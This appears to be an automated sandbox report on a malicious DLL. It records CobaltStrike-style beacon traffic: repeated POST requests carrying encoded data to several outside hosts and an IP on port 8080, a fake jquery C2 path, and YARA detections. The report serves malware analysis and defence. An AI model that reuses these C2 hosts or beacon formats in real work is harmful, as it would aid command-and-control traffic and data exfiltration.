                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/H0N6dX1le310YXlkfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/fBM5IDlCe3J+YXp8c2J9ZX0= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw= HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw= HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR8 HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficTCP traffic: 192.168.2.7:49753 -> 23.82.140.206:8080
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.82.140.206
                  Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000002.519163002.0000000003760000.00000004.00000040.sdmpString found in binary or memory: http://code.jquery.com/
                  Source: loaddll32.exe, 00000000.00000003.265875146.0000000003605000.00000004.00000001.sdmpString found in binary or memory: http://code.jquery.com/1
                  Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                  Source: WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: loaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.winI
                  Source: loaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/a
                  Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: C8408FE5CA4467EE4DA84A76EF238FE3.0.drString found in binary or memory: http://r3.i.lencr.org/
                  Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                  Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                  Source: loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drString found in binary or memory: http://x1.c.lencr.org/0
                  Source: 2D85F72862B55C4EADD9E66E06947F3D.0.drString found in binary or memory: http://x1.i.lencr.org/
                  Source: loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drString found in binary or memory: http://x1.i.lencr.org/0
                  Source: loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://23.82.140.206:8080/
                  Source: loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://23.82.140.206:8080/mpersonation
                  Source: loaddll32.exe, 00000000.00000003.328522826.0000000000AB8000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com/
                  Source: loaddll32.exe, 00000000.00000003.266948088.0000000000AB8000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com/v
                  Source: loaddll32.exe, 00000000.00000002.519109976.0000000003669000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/
                  Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.357019934.00000000035FD000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.324864290.0000000003605000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.js
                  Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVw
                  Source: loaddll32.exe, 00000000.00000003.311329972.0000000003605000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfw
                  Source: loaddll32.exe, 00000000.00000003.286730458.0000000000AB8000.00000004.00000001.sdmpString found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.com
                  Source: unknownHTTP traffic detected: POST /QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw= HTTP/1.1Host: hoteloaktree.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: unknownDNS traffic detected: queries for: hoteloaktree.com
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009622E0 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,3_2_009622E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097088C SetDisplayAutoRotationPreferences,SetGestureConfig,SetInternalWindowPos,SetKeyboardState,SetMagnificationLensCtxInformation,SetMirrorRendering,GetKeyboardState,SetShellWindowEx,3_2_0097088C
                  Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8408FE5CA4467EE4DA84A76EF238FE3Jump to dropped file
                  Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
                  Source: p2SijKiqgZ.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                  Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
                  Source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
                  Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
